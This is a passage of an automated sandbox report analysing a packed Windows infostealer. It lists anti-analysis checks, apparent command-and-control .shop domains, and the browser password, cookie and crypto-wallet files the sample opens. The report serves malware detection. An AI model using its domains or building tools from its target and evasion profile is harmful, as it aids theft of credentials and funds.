              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49737 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: .vmp0 and .vmp1 section names
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D020100_2_00D02010
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF04B70_2_00CF04B7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD47400_2_00CD4740
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0CA00_2_00CF0CA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD10000_2_00CD1000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD60300_2_00CD6030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD52F00_2_00CD52F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD32600_2_00CD3260
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D045F00_2_00D045F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD65F00_2_00CD65F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDF6900_2_00CDF690
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D097D00_2_00D097D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD17000_2_00CD1700
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF58A20_2_00CF58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3387F0_2_00D3387F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF59D20_2_00CF59D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF594F0_2_00CF594F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D09AF00_2_00D09AF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CECAEC0_2_00CECAEC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D01A700_2_00D01A70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD7CB00_2_00CD7CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD3D700_2_00CD3D70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD2E700_2_00CD2E70
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00CD8700 appears 50 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00CD8D30 appears 168 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D2F648 appears 34 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1677287917.0000000003875000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676866829.00000000038A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 5745152 > 1048576
              Source: file.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x57a000
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
              Source: file.exeStatic PE information: section name: .vmp0
              Source: file.exeStatic PE information: section name: .vmp1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1B036 push esi; ret 0_2_00D1B046
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A203 push esi; ret 0_2_00D1A204
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A353 push ebp; ret 0_2_00D1A354
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A315 push esi; ret 0_2_00D1A31E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D194FA push esi; ret 0_2_00D194FB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1B5C8 push esi; ret 0_2_00D1B5E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1C560 push esi; ret 0_2_00D1C576
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1C6E0 push edi; ret 0_2_00D1C6F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D19690 push ebp; ret 0_2_00D196E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2F68D push ecx; ret 0_2_00D2F6A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D197D0 push edi; ret 0_2_00D1980C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A7D5 push esi; ret 0_2_00D1A7D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A7DD push esi; ret 0_2_00D1A7DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A74B push esi; ret 0_2_00D1A758
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1986D push edi; ret 0_2_00D1986E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1986F push esi; ret 0_2_00D19870
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A82F push esi; ret 0_2_00D1A836
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1BAA2 push ebp; ret 0_2_00D1BAB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1AA3B push ebp; ret 0_2_00D1AA3C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1AA27 push ebp; ret 0_2_00D24576
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1BA29 push edi; ret 0_2_00D1BA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D19B94 push esi; ret 0_2_00D19B95
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D19B77 push edi; ret 0_2_00D19B91
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1AC95 push edi; ret 0_2_00D1AC96
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1ACA0 push edi; ret 0_2_00D1ACB1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2DFD0 push ecx; ret 0_2_00D2DFE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1AFF8 push esi; ret 0_2_00D1B046

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\file.exeMemory written: PID: 7328 base: 750005 value: E9 8B 2F 7B 76 Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: PID: 7328 base: 76F02F90 value: E9 7A D0 84 89 Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: file.exe, file.exe, 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: ZSBIEDLL.DLL
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1584A90 second address: 1584AB6 instructions: 0x00000000 rdtsc 0x00000002 cbw 0x00000004 dec cl 0x00000006 mov dx, 68D2h 0x0000000a sbb edx, eax 0x0000000c xor cl, 00000057h 0x0000000f sub dl, FFFFFFE0h 0x00000012 ror ax, FFEFh 0x00000016 neg cl 0x00000018 xchg ah, dl 0x0000001a inc cl 0x0000001c adc dl, FFFFFFCEh 0x0000001f inc edx 0x00000020 not eax 0x00000022 xor bl, cl 0x00000024 push edi 0x00000025 push esi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F748CE second address: DEFACA instructions: 0x00000000 rdtsc 0x00000002 bsr ax, bx 0x00000006 shr dh, 0000006Bh 0x00000009 movzx edx, byte ptr [edi] 0x0000000c movzx eax, dx 0x0000000f cmovnp eax, ecx 0x00000012 sal ah, FFFFFFE7h 0x00000015 xor dl, bl 0x00000017 cwde 0x00000018 not dl 0x0000001a mov eax, ebp 0x0000001c ror eax, FFFFFFD4h 0x0000001f not al 0x00000021 ror dl, 1 0x00000023 inc dl 0x00000025 sbb ah, al 0x00000027 mov ah, dl 0x00000029 xor dl, FFFFFFB8h 0x0000002c xor bl, dl 0x0000002e sub eax, 39955627h 0x00000033 ror eax, cl 0x00000035 mov byte ptr [esp+edx], cl 0x00000038 rcl ax, 001Eh 0x0000003c sub edi, 00000004h 0x00000042 rol ax, FFA4h 0x00000046 cmp ah, 00000024h 0x00000049 bt eax, edi 0x0000004c mov eax, dword ptr [edi] 0x0000004e stc 0x0000004f xor eax, ebx 0x00000051 cmp bp, 66F3h 0x00000056 add eax, 6B9E6E30h 0x0000005b ror eax, 02h 0x0000005e cmp esi, 37965EF5h 0x00000064 test ebp, edx 0x00000066 jmp 00007F0ABCD616DBh 0x0000006b bswap eax 0x0000006d stc 0x0000006e clc 0x0000006f cmp ebp, ebp 0x00000071 lea eax, dword ptr [eax+1D8F433Fh] 0x00000077 xor ebx, eax 0x00000079 add esi, eax 0x0000007b jmp 00007F0ABCBE92DCh 0x00000080 push esi 0x00000081 ret 0x00000082 lea edi, dword ptr [edi-00000001h] 0x00000088 not dh 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7412Thread sleep time: -30000s >= -30000sJump to behavior
              Source: file.exe, 00000000.00000003.1747790604.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1748688566.000000000095E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1748878765.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676279859.00000000009BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D03CC0 LdrInitializeThunk,0_2_00D03CC0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: demonstationfukewko.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: liabilitynighstjsko.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: alcojoldwograpciw.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: incredibleextedwj.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shortsvelventysjo.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shatterbreathepsw.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: tolerateilusidjukl.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: productivelookewr.shop
              Source: file.exe, 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: greetclassifytalk.shop
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.1748878765.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1728022211.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: file.exe, 00000000.00000002.1749033743.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000002.1749033743.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000002.1749033743.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000002.1748447726.0000000000578000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000002.1749033743.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000000.00000002.1748688566.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
